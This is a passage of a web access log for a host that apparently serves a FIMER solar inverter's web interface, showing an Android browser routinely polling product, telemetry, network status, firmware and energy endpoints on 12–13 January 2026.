AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.12.170] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.12.170] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.12.170] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.12.170] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.12.170] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/" [Client 37.76.12.170] [Length 1663] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.12.170] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.12.170] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.12.170] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.12.170] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.12.170] [Length 1670] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.12.170] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.12.170] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.12.170] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:52 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.12.170] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.12.170] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.12.170] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.12.170] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.12.170] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:53 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.12.170] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:56 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.12.170] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:57 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.12.170] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:57 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:57 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.12.170] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.12.170] [Length 1680] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 37.76.12.170] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 37.76.12.170] [Length 337] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 37.76.12.170] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 37.76.12.170] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.12.170] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768258799999&bin=week_of_year&aggregation=diff" [Client 37.76.12.170] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 37.76.12.170] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768258799999&bin=month_of_year&aggregation=diff" [Client 37.76.12.170] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:58 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768258799999&bin=yearly&aggregation=diff" [Client 37.76.12.170] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:59 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.12.170] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:56:59 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.12.170] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:57:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.12.170] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:57:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.12.170] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:57:02 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.12.170] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:57:03 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.12.170] [Length 1676] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[12/Jan/2026:17:57:03 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.12.170] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product-metadata" [Client 37.76.13.124] [Length 104709] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 404 404 - GET http fimer.profibot.hu "/favicon.ico" [Client 37.76.13.124] [Length 181] [Gzip 3.22] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.13.124] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.13.124] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product/commissioned" [Client 37.76.13.124] [Length 4] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.13.124] [Length 1678] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.13.124] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.13.124] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.13.124] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/access/check" [Client 37.76.13.124] [Length 45] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.13.124] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/config" [Client 37.76.13.124] [Length 184] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.13.124] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.13.124] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:51 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.13.124] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:33:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.13.124] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.13.124] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.13.124] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.13.124] [Length 1680] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.13.124] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.13.124] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:05 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.13.124] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.13.124] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[13/Jan/2026:05:34:10 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.13.124] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) 